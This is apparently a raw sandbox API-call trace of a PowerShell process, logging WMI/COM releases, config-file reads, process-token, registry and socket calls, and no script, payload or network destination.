	[0155.570] CloseHandle (hObject=0x3b4) returned 1
	[0155.571] CloseHandle (hObject=0x3b0) returned 1
	[0155.571] CloseHandle (hObject=0x3ac) returned 1
	[0155.572] CloseHandle (hObject=0x3a4) returned 1
	[0155.573] CloseHandle (hObject=0x398) returned 1
	[0155.573] CloseHandle (hObject=0x3d8) returned 1
	[0155.574] CloseHandle (hObject=0x3a8) returned 1
	[0155.600] RegCloseKey (hKey=0x3a0) returned 0x0
	[0155.600] CloseHandle (hObject=0x384) returned 1
	[0195.205] CoGetContextToken (in: pToken=0x1b4cf690 | out: pToken=0x1b4cf690) returned 0x0
	[0195.205] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0195.206] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x0
	[0195.206] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0195.206] IUnknown:Release (This=0x1cd14830) returned 0x1
	[0195.207] CoGetContextToken (in: pToken=0x1b4cf4c0 | out: pToken=0x1b4cf4c0) returned 0x0
	[0195.207] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x1
	[0195.207] IUnknown:Release (This=0x1cd145f8) returned 0x0
	[0195.348] CloseHandle (hObject=0x4ac) returned 1
	[0195.349] CloseHandle (hObject=0x4b0) returned 1
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf690 | out: pToken=0x1b4cf690) returned 0x0
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.332] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x0
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.332] IUnknown:Release (This=0x1cd18410) returned 0x1
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.332] WbemLocator:IUnknown:Release (This=0x1cd11a40) returned 0x0
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.332] IUnknown:Release (This=0x1cd1c960) returned 0x1
	[0214.332] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.333] WbemLocator:IUnknown:Release (This=0x1cd11c00) returned 0x0
	[0214.333] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.333] IUnknown:Release (This=0x1cd1de20) returned 0x1
	[0214.333] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.333] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x0
	[0214.333] CoGetContextToken (in: pToken=0x1b4cf5b0 | out: pToken=0x1b4cf5b0) returned 0x0
	[0214.333] IUnknown:Release (This=0x1cd20950) returned 0x1
	[0214.334] CoGetContextToken (in: pToken=0x1b4cf4c0 | out: pToken=0x1b4cf4c0) returned 0x0
	[0214.334] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0214.334] IUnknown:Release (This=0x1cd1c728) returned 0x0
	[0214.471] CoGetContextToken (in: pToken=0x1b4cf4c0 | out: pToken=0x1b4cf4c0) returned 0x0
	[0214.471] WbemLocator:IUnknown:Release (This=0x1b83c180) returned 0x1
	[0214.471] IUnknown:Release (This=0x1cd16188) returned 0x0
	[0214.472] CoGetContextToken (in: pToken=0x1b4cf4c0 | out: pToken=0x1b4cf4c0) returned 0x0
	[0214.472] WbemLocator:IUnknown:Release (This=0x1b83c600) returned 0x1
	[0214.472] IUnknown:Release (This=0x1cd20798) returned 0x0
	[0214.473] CoGetContextToken (in: pToken=0x1b4cf4c0 | out: pToken=0x1b4cf4c0) returned 0x0
	[0214.473] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x1
	[0214.474] IUnknown:Release (This=0x1cd181d8) returned 0x0
	[0214.475] CloseHandle (hObject=0x4ac) returned 1
	[0214.476] CloseHandle (hObject=0x4b0) returned 1

Thread:
	id = 168
	os_tid = 0x674

	[0152.373] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0152.378] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0152.383] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.383] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.385] VirtualQuery (in: lpAddress=0x1c6edae0, lpBuffer=0x1c6ee9a0, dwLength=0x30 | out: lpBuffer=0x1c6ee9a0*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.463] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.464] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.467] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.467] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.471] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.471] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.484] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.484] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.487] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.487] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.489] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.489] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.514] VirtualQuery (in: lpAddress=0x1c6edd90, lpBuffer=0x1c6eec50, dwLength=0x30 | out: lpBuffer=0x1c6eec50*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0152.516] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.516] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.519] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.519] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.520] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.520] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.522] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.522] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.551] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.551] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.614] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.614] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.616] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.616] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.618] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.618] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.620] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.620] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.622] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.622] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.624] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.624] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.626] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.626] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.653] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.654] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.738] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.738] CoTaskMemFree (pv=0x1b7dacf0) 
	[0152.742] CoTaskMemAlloc (cb=0x104) returned 0x1b7dacf0
	[0152.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dacf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.742] CoTaskMemFree (pv=0x1b7dacf0) 
	[0153.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ec860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ec760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.431] CoTaskMemAlloc (cb=0x20c) returned 0x33b1c0
	[0153.431] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33b1c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0153.432] CoTaskMemFree (pv=0x33b1c0) 
	[0153.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6ec8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0153.455] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.455] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec828 | out: TokenHandle=0x1c6ec828*=0x384) returned 1
	[0153.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c6ec480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0153.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ec8d0 | out: lpFileInformation=0x1c6ec8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0153.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c6ec420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0153.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ec880 | out: lpFileInformation=0x1c6ec880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0153.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c6ec260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0153.595] SetErrorMode (uMode=0x1) returned 0x1
	[0153.595] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8
	[0153.595] GetFileType (hFile=0x3a8) returned 0x1
	[0153.595] SetErrorMode (uMode=0x1) returned 0x1
	[0153.595] GetFileType (hFile=0x3a8) returned 0x1
	[0153.598] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x1c6ec878 | out: lpFileSizeHigh=0x1c6ec878*=0x0) returned 0x622a
	[0153.598] ReadFile (in: hFile=0x3a8, lpBuffer=0x31d7200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec798, lpOverlapped=0x0 | out: lpBuffer=0x31d7200*, lpNumberOfBytesRead=0x1c6ec798*=0x1000, lpOverlapped=0x0) returned 1
	[0153.617] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec2c8, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0153.618] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec2c8, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0153.619] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec2c8, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0153.619] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec2c8, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0153.627] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec408, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec408*=0x1000, lpOverlapped=0x0) returned 1
	[0153.627] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec288, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec288*=0x22a, lpOverlapped=0x0) returned 1
	[0153.627] ReadFile (in: hFile=0x3a8, lpBuffer=0x3071560, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c6ec328, lpOverlapped=0x0 | out: lpBuffer=0x3071560*, lpNumberOfBytesRead=0x1c6ec328*=0x0, lpOverlapped=0x0) returned 1
	[0153.627] CloseHandle (hObject=0x3a8) returned 1
	[0153.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ec850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ec750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.736] CoTaskMemAlloc (cb=0x20c) returned 0x33b1c0
	[0153.736] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33b1c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0153.736] CoTaskMemFree (pv=0x33b1c0) 
	[0153.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6ec8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0153.738] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.738] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6eca88 | out: TokenHandle=0x1c6eca88*=0x3a8) returned 1
	[0153.739] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.739] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6eca88 | out: TokenHandle=0x1c6eca88*=0x398) returned 1
	[0153.741] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.741] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec828 | out: TokenHandle=0x1c6ec828*=0x3a4) returned 1
	[0153.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ec8d0 | out: lpFileInformation=0x1c6ec8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c6ec420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.744] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c6ec880 | out: lpFileInformation=0x1c6ec880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.744] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.745] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6eca88 | out: TokenHandle=0x1c6eca88*=0x3ac) returned 1
	[0153.745] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.745] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6eca88 | out: TokenHandle=0x1c6eca88*=0x3b0) returned 1
	[0153.768] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.768] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec708 | out: TokenHandle=0x1c6ec708*=0x3b4) returned 1
	[0153.921] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.921] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec708 | out: TokenHandle=0x1c6ec708*=0x3b8) returned 1
	[0154.084] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c6ece28 | out: lpWSAData=0x1c6ece28) returned 0
	[0154.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ebf48 | out: phkResult=0x1c6ebf48*=0x3d0) returned 0x0
	[0154.099] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c6ebecc, lpData=0x0, lpcbData=0x1c6ebec8*=0x0 | out: lpType=0x1c6ebecc*=0x1, lpData=0x0, lpcbData=0x1c6ebec8*=0xe) returned 0x0
	[0154.099] CoTaskMemAlloc (cb=0x12) returned 0x1b81c6b0
	[0154.099] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c6ebe9c, lpData=0x1b81c6b0, lpcbData=0x1c6ebe98*=0xe | out: lpType=0x1c6ebe9c*=0x1, lpData="Client", lpcbData=0x1c6ebe98*=0xe) returned 0x0
	[0154.099] CoTaskMemFree (pv=0x1b81c6b0) 
	[0154.099] RegCloseKey (hKey=0x3d0) returned 0x0
	[0154.104] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d4
	[0154.109] setsockopt (s=0x3d4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0154.109] closesocket (s=0x3d4) returned 0
	[0154.110] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d4
	[0154.111] setsockopt (s=0x3d4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0154.112] closesocket (s=0x3d4) returned 0
	[0154.169] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.169] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec6a8 | out: TokenHandle=0x1c6ec6a8*=0x3d4) returned 1
	[0154.174] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.174] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ec6a8 | out: TokenHandle=0x1c6ec6a8*=0x3d8) returned 1
	[0154.195] GetCurrentProcessId () returned 0x708
	[0154.202] CoTaskMemAlloc (cb=0x204) returned 0x3e53e0
	[0154.202] GetComputerNameW (in: lpBuffer=0x3e53e0, nSize=0x3099ad8 | out: lpBuffer="XDUWTFONO", nSize=0x3099ad8) returned 1
	[0154.203] CoTaskMemFree (pv=0x3e53e0) 
	[0154.204] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ecb88 | out: phkResult=0x1c6ecb88*=0x3dc) returned 0x0
	[0154.204] RegQueryValueExW (in: hKey=0x3dc, lpValueName="Library", lpReserved=0x0, lpType=0x1c6ecb0c, lpData=0x0, lpcbData=0x1c6ecb08*=0x0 | out: lpType=0x1c6ecb0c*=0x1, lpData=0x0, lpcbData=0x1c6ecb08*=0x1c) returned 0x0
	[0154.204] CoTaskMemAlloc (cb=0x20) returned 0x1b7c6090
	[0154.204] RegQueryValueExW (in: hKey=0x3dc, lpValueName="Library", lpReserved=0x0, lpType=0x1c6ecadc, lpData=0x1b7c6090, lpcbData=0x1c6ecad8*=0x1c | out: lpType=0x1c6ecadc*=0x1, lpData="netfxperf.dll", lpcbData=0x1c6ecad8*=0x1c) returned 0x0
	[0154.204] CoTaskMemFree (pv=0x1b7c6090) 
	[0154.204] RegQueryValueExW (in: hKey=0x3dc, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c6ecb0c, lpData=0x0, lpcbData=0x1c6ecb08*=0x0 | out: lpType=0x1c6ecb0c*=0x4, lpData=0x0, lpcbData=0x1c6ecb08*=0x4) returned 0x0
	[0154.205] RegQueryValueExW (in: hKey=0x3dc, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c6ecb10, lpData=0x1c6ecb0c, lpcbData=0x1c6ecb08*=0x4 | out: lpType=0x1c6ecb10*=0x4, lpData=0x1c6ecb0c*=0x1, lpcbData=0x1c6ecb08*=0x4) returned 0x0
	[0154.205] RegQueryValueExW (in: hKey=0x3dc, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c6ecb0c, lpData=0x0, lpcbData=0x1c6ecb08*=0x0 | out: lpType=0x1c6ecb0c*=0x4, lpData=0x0, lpcbData=0x1c6ecb08*=0x4) returned 0x0
	[0154.205] RegQueryValueExW (in: hKey=0x3dc, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c6ecb10, lpData=0x1c6ecb0c, lpcbData=0x1c6ecb08*=0x4 | out: lpType=0x1c6ecb10*=0x4, lpData=0x1c6ecb0c*=0x137a, lpcbData=0x1c6ecb08*=0x4) returned 0x0
	[0154.206] RegCloseKey (hKey=0x3dc) returned 0x0
	[0154.308] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c6ecb48 | out: phkResult=0x1c6ecb48*=0x3dc) returned 0x0
	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c6ecacc, lpData=0x0, lpcbData=0x1c6ecac8*=0x0 | out: lpType=0x1c6ecacc*=0x4, lpData=0x0, lpcbData=0x1c6ecac8*=0x4) returned 0x0
